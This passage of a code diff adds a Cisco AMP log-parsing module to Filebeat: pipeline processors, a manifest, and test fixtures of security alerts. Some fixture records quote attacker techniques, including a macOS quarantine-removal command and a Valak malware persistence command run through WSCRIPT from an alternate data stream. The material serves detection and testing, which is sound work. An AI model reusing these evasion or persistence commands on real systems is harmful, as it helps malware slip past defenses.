allow_duplicates: false +- append: + field: related.hosts + value: "{{ host.name }}" + if: ctx?.host?.name != null + allow_duplicates: false +- append: + field: related.ip + value: "{{ source.ip }}" + if: ctx?.source?.ip != null + allow_duplicates: false +- append: + field: related.ip + value: "{{ destination.ip }}" + if: ctx?.destination?.ip != null + allow_duplicates: false +- append: + field: related.ip + value: "{{ cisco.amp.computer.external_ip }}" + if: ctx?.cisco?.amp?.computer?.external_ip != null + allow_duplicates: false +- foreach: + field: cisco.amp.computer.network_addresses + processor: + append: + field: related.ip + value: "{{ _ingest._value.ip }}" + allow_duplicates: false + if: ctx?.cisco?.amp?.computer?.network_addresses != null +- foreach: + field: cisco.amp.computer.network_addresses + processor: + append: + field: cisco.amp.related.mac + value: "{{ _ingest._value.mac }}" + allow_duplicates: false + if: ctx?.cisco?.amp?.computer?.network_addresses != null +- foreach: + field: cisco.amp.vulnerabilities + processor: + append: + field: cisco.amp.related.cve + value: "{{ _ingest._value.cve }}" + allow_duplicates: false + if: ctx?.cisco?.amp?.vulnerabilities != null + +############# +## GeoIP ## +############# +- geoip: + field: source.ip + target_field: source.geo + ignore_missing: true + if: "ctx.source?.geo == null" +- geoip: + field: destination.ip + target_field: destination.geo + ignore_missing: true + if: "ctx.destination?.geo == null" +- geoip: + database_file: GeoLite2-ASN.mmdb + field: source.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true +- geoip: + database_file: GeoLite2-ASN.mmdb + field: destination.ip + target_field: destination.as + properties: + - asn + - organization_name + ignore_missing: true +- rename: + field: source.as.asn + target_field: source.as.number + ignore_missing: true +- rename: + field: source.as.organization_name + target_field: source.as.organization.name + ignore_missing: true +- rename: + field: destination.as.asn + target_field: destination.as.number + ignore_missing: true +- rename: + field: destination.as.organization_name + target_field: destination.as.organization.name + ignore_missing: true + +############# +## Cleanup ## +############# +- date: + field: cisco.amp.threat_hunting.incident_start_time + target_field: cisco.amp.threat_hunting.incident_start_time + formats: + - UNIX + ignore_failure: true + if: ctx?.cisco?.amp?.threat_hunting?.incident_start_time != null +- date: + field: cisco.amp.threat_hunting.incident_end_time + target_field: cisco.amp.threat_hunting.incident_end_time + formats: + - UNIX + ignore_failure: true + if: ctx?.cisco?.amp?.threat_hunting?.incident_end_time != null + + +- script: + lang: painless + description: This script processor iterates over the whole document to remove fields with null values. + if: ctx?.json != null + source: | + void handleMap(Map map) { + for (def x : map.values()) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + map.values().removeIf(v -> v == null); + } + void handleList(List list) { + for (def x : list) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + } + handleMap(ctx); + +- remove: + field: + - cisco.amp.timestamp + - cisco.amp.computer.links + - json + - cisco.amp.severity + - cisco.amp.start_timestamp + - cisco.amp.date + - cisco.amp.start_timestamp_nanoseconds + - cisco.amp.start_date + ignore_missing: true +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' + diff --git a/x-pack/filebeat/module/cisco/amp/manifest.yml b/x-pack/filebeat/module/cisco/amp/manifest.yml new file mode 100644 index 000000000000..9458f80a17df --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/manifest.yml @@ -0,0 +1,24 @@ +module_version: 1.0 + +var: + - name: input + default: httpjson + - name: url + default: https://api.amp.cisco.com/v1/events?offset=0&limit=300 + - name: tags + default: [cisco-amp, forwarded] + - name: ssl + - name: request_timeout + default: 60s + - name: limit + default: 100 + - name: client_id + - name: api_key + - name: first_interval + default: 24h + - name: interval + default: 60m + +ingest_pipeline: + - ingest/pipeline.yml +input: config/config.yml diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log new file mode 100644 index 000000000000..14599ecfc0cc --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log @@ -0,0 +1,8 @@ +{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":153000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.22gp.1201","detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"user@domain","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:ac:af:1d:ad"},{"ip":"192.168.120.1","mac":"12:24:56:c2:00:01"},{"ip":"192.168.160.1","mac":"12:50:56:c2:53:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","file_name":"HYXiN3hY.exe.part","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part","identity":{"sha256":"e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc","sha1":"d0c4192b65e36553fvfd2b83f3113f6ae8390baa","md5":"9a8557b98ed1469272fa0ace91d63477"},"parent":{"process_id":88,"disposition":"Unknown","file_name":"firefox.exe","identity":{"sha256":"a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab","sha1":"d539afb0991e823c7cdf824b610a5a5d7655a2da","md5":"e50ab86d5409d4d0ad386b27ea7f78fb"}}}}} +{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":163000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:bb:af:22:fd"},{"ip":"192.168.120.1","mac":"00:52:12:c0:11:01"},{"ip":"192.168.160.1","mac":"01:51:56:c0:c2:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","identity":{"sha256":"e678899d7ea9702184167b56655f91a69f8a0bdc9df65612762252c053c2cd7c"}}}} +{"data":{"id":123578990,"timestamp":1605085728,"timestamp_nanoseconds":183000000,"date":"2020-11-11T09:08:48+00:00","event_type":"Exploit Prevention","event_type_id":1090519103,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"uuser@domain","active":true,"network_addresses":[{"ip":"192.1.1.1","mac":"av:1d:13:a2:21:1f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235","trajectory":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","identity":{"sha256":"2262a4766bc394b4cb2d658144b207183ff23a3039121cd74e615ab64e6e57d6","sha1":"22643e8613bb0dd90888b17367007489fe16693e4","md5":"bcc2a6493e0641bb1e60cbf640169e579"},"parent":{"process_id":7328,"disposition":"Unknown","file_name":"OfficeSetup.exe","identity":{"sha256":"a6d1aa0df1c23eb8b7563245082ed2eddf00e3da62cbeb41ac701123vasce927f465d","sha1":"90d3a389307ag2a7fbv8726502077b69ab0fd79a0","md5":"6a262b4af012ec81ffeb36f5faf70311"}},"attack_details":{"application":"powershell.exe","attacked_module":"Script Control:System.Management.Automation.dll","base_address":"0x000F0000","suspicious_files":[""],"indicators":[{"MITRE_Tactic":[{"tactic_id":"TA0002","name":"Execution"}],"severity":"medium","description":"A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.","short_description":"Excessively long PowerShell command detected","id":123578990,"MITRE_Technique":[{"tehcnique_id":"T1086","name":"PowerShell","technique_id":"T1086"}]}]}}}} +{"data":{"id":123578990,"timestamp":1605084750,"timestamp_nanoseconds":736000000,"date":"2020-11-11T08:52:30+00:00","event_type":"File Fetch Failed","event_type_id":2164260910,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"error":{"error_code":3240099848,"description":"File not found"},"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.184","mac":"av:6b:fc:23:a1:29"},{"ip":"192.168.2.1","mac":"00:50:24:c0:01:01"},{"ip":"192.168.12.1","mac":"55:50:22:c0:12:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd","trajectory":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Unknown","file_name":"setup.exe","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\somezip.zip\\Visual_install\\setup.exe","identity":{"sha256":"a8b424b65d1550c87b531f7a14523bvdf982d8f869976f99fa1cef5342ausdy"}}}} +{"data":{"id":123578990,"timestamp":1605079734,"timestamp_nanoseconds":24000000,"date":"2020-11-11T07:28:54+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","start_timestamp":1605079733,"start_date":"2020-11-11T07:28:53+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.2","mac":"ac:aa:22:00:11:55"},{"ip":"192.168.228.70","mac":"f2:18:12:75:55:12"},{"ip":"192.12.52.12","mac":"65:29:8f:97:04:ea"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-1235213","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-123512/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"cloud_ioc":{"description":"A process was seen whitelisting/restoring a file from quarantine. This is an uncommon task, and warrants further investigation as OS X is not known to quarantine files unnecessarily. This is also known to be part of the Mitre Att&ck Framework, technique T1144.","short_description":"OSX.QuarantineExclusion.ioc"},"file":{"disposition":"Clean","file_name":"sudo","file_path":"file:///usr/bin/sudo","identity":{"sha256":"123dfsdg234b7ba3d5ff63033129fa1b96975ad124sdgasdf1sdf"},"parent":{"disposition":"Clean","identity":{"sha256":"sadgf234643sdaffee7a9bd309a4123sdfag9523e8b152123sdfgdfsf2"}}},"command_line":{"arguments":"sudo /usr/bin/xattr -r -d com.apple.quarantine uTorrent.app"},"tactics":["TA0005"],"techniques":["T1144"]}} +{"data":{"id":123578990,"timestamp":1605079353,"timestamp_nanoseconds":170000000,"date":"2020-11-11T07:22:33+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.2","mac":"11:50:f1:12:23:23"},{"ip":"192.168.1.1","mac":"0a:12:27:52:00:12"},{"ip":"192.168.2.1","mac":"00:c1:12:c0:22:12"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/123543-sdgfdf234-sadf13-123"}},"file":{"disposition":"Unknown","file_name":"locale.exe","file_path":"\\\\?\\C:\\tools\\msys64\\usr\\bin\\locale.exe","identity":{"sha256":"asdf123sdfaac359fcb0d488ca489e2d55645ce34709fdafb78e336405cb","sha1":"asdfsadf1234140de34a45db0124e5c518bf612","md5":"asdgsdrf2346523279149285c8ddc8"}}}} +{"data":{"id":123578990,"timestamp":1605079316,"timestamp_nanoseconds":611596000,"date":"2020-11-11T07:21:56+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.1","mac":"f2:18:12:23:c5:54"},{"ip":"","mac":"82:2a:e3:12:58:02"},{"ip":"","mac":"vg:de:12:00:v1:22"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"file":{"disposition":"Clean","file_name":"sudo","file_path":"/usr/bin/sudo","identity":{"sha256":"123asfdsdfa125ff63033129fa1b96975ad4d6da2e2a4cf6393"}}}} +{"data":{"id":123578990,"timestamp":1605030133,"timestamp_nanoseconds":0,"date":"2020-11-10T17:42:13+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Low","start_timestamp":1605030131,"start_date":"2020-11-10T17:42:11+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.42","mac":"av:17:1b:fe:v2:f0"},{"ip":"192.168.1.1","mac":"00:42:v2:3c:12:12"},{"ip":"192.168.6.1","mac":"1f:12:27:00:00:52"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/124324df-2123-523-41231","trajectory":"https://api.eu.amp.cisco.com/v1/computers/124324df123-523-41231/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/1235643-sdf123123"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"5643234fsadgef6644b8b69e999c454c045a2d8ec476c4b6165df4ed03"},"parent":{"disposition":"Clean","identity":{"sha256":"agdfsdaf987sdf036070cca561bff5337c472313c0cb4ad"}}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"15.007.20033","cve":"CVE-2014-0566","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0566"},{"cve":"CVE-2015-3095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3095"},{"cve":"CVE-2015-4435","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4435"},{"cve":"CVE-2015-4438","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4438"},{"cve":"CVE-2015-4441","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4441"},{"cve":"CVE-2015-4445","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4445"},{"cve":"CVE-2015-4446","score":"7.5","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4446"},{"cve":"CVE-2015-4447","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4447"},{"cve":"CVE-2015-4448","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4448"},{"cve":"CVE-2015-4451","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4451"},{"cve":"CVE-2015-4452","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4452"},{"cve":"CVE-2015-5085","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5085"},{"cve":"CVE-2015-5086","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5086"},{"cve":"CVE-2015-5087","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5087"},{"cve":"CVE-2015-5090","score":"7.2","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5090"},{"cve":"CVE-2015-5091","score":"7.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5091"},{"cve":"CVE-2015-5093","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5093"},{"cve":"CVE-2015-5094","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5094"},{"cve":"CVE-2015-5095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5095"},{"cve":"CVE-2015-5096","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5096"},{"cve":"CVE-2015-5097","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5097"},{"cve":"CVE-2015-5098","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5098"},{"cve":"CVE-2015-5099","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5099"},{"cve":"CVE-2015-5100","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5100"},{"cve":"CVE-2015-5101","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5101"},{"cve":"CVE-2015-5102","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5102"},{"cve":"CVE-2015-5103","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5103"},{"cve":"CVE-2015-5104","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5104"},{"cve":"CVE-2015-5105","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5105"},{"cve":"CVE-2015-5106","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5106"},{"cve":"CVE-2015-5108","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5108"},{"cve":"CVE-2015-5109","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5109"},{"cve":"CVE-2015-5110","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5110"},{"cve":"CVE-2015-5111","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5111"},{"cve":"CVE-2015-5113","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5113"},{"cve":"CVE-2015-5114","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5114"},{"cve":"CVE-2015-5115","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5115"},{"cve":"CVE-2017-11211","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11211"},{"cve":"CVE-2017-11212","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11212"},{"cve":"CVE-2017-11214","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11214"},{"cve":"CVE-2017-11216","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11216"},{"cve":"CVE-2017-11218","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11218"},{"cve":"CVE-2017-11219","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11219"},{"cve":"CVE-2017-11220","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11220"},{"cve":"CVE-2017-11221","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11221"},{"cve":"CVE-2017-11222","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11222"},{"cve":"CVE-2017-11223","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11223"},{"cve":"CVE-2017-11224","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11224"},{"cve":"CVE-2017-11226","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11226"},{"cve":"CVE-2017-11227","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11227"},{"cve":"CVE-2017-11228","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11228"},{"cve":"CVE-2017-11229","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11229"},{"cve":"CVE-2017-11234","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11234"},{"cve":"CVE-2017-11235","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11235"},{"cve":"CVE-2017-11237","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11237"},{"cve":"CVE-2017-11241","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11241"},{"cve":"CVE-2017-11251","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11251"},{"cve":"CVE-2017-11254","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11254"},{"cve":"CVE-2017-11256","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11256"},{"cve":"CVE-2017-11257","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11257"},{"cve":"CVE-2017-11259","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11259"},{"cve":"CVE-2017-11260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11260"},{"cve":"CVE-2017-11261","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11261"},{"cve":"CVE-2017-11262","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11262"},{"cve":"CVE-2017-11263","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11263"},{"cve":"CVE-2017-11267","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11267"},{"cve":"CVE-2017-11269","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11269"},{"cve":"CVE-2017-11270","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11270"},{"cve":"CVE-2017-11271","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11271"}]}} diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json new file mode 100644 index 000000000000..52efeb8e97ba --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json @@ -0,0 +1,87 @@ +[ + { + "@timestamp": "2020-11-11T09:51:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "1235-1234sdgf-654sdf-7562345", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "192.168.196.22", + "mac": "aa:d9:ac:af:1d:ad" + }, + { + "ip": "192.168.120.1", + "mac": "12:24:56:c2:00:01" + }, + { + "ip": "192.168.160.1", + "mac": "12:50:56:c2:53:08" + } + ], + "cisco.amp.connector_guid": "1235-1234sdgf-654sdf-7562345", + "cisco.amp.detection": "W32.Trojan.22gp.1201", + "cisco.amp.detection_id": "12365423467", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Unknown", + "cisco.amp.group_guids": [ + "6542345gdfs-234-sdf2-34-6345243" + ], + "cisco.amp.related.mac": [ + "aa:d9:ac:af:1d:ad", + "12:24:56:c2:00:01", + "12:50:56:c2:53:08" + ], + "cisco.amp.timestamp_nanoseconds": 153000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 123578990, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "9a8557b98ed1469272fa0ace91d63477", + "file.hash.sha1": "d0c4192b65e36553fvfd2b83f3113f6ae8390baa", + "file.hash.sha256": "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc", + "file.name": "HYXiN3hY.exe.part", + "file.path": "\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part", + "fileset.name": "amp", + "host.hostname": "testhost", + "host.name": "testhost", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@domain", + "input.type": "log", + "log.offset": 0, + "process.hash.md5": "e50ab86d5409d4d0ad386b27ea7f78fb", + "process.hash.sha1": "d539afb0991e823c7cdf824b610a5a5d7655a2da", + "process.hash.sha256": "a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab", + "process.name": "firefox.exe", + "process.pid": 88, + "related.hash": [ + "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc", + "9a8557b98ed1469272fa0ace91d63477", + "d0c4192b65e36553fvfd2b83f3113f6ae8390baa" + ], + "related.hosts": [ + "testhost" + ], + "related.ip": [ + "8.8.8.8", + "192.168.196.22", + "192.168.120.1", + "192.168.160.1" + ], + "related.user": [ + "user@domain" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log new file mode 100644 index 000000000000..ed37c533eac2 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log @@ -0,0 +1,962 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n - Review all activity performed by the user\r\n - Upload any suspicious files to ThreatGrid for analysis\r\n - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

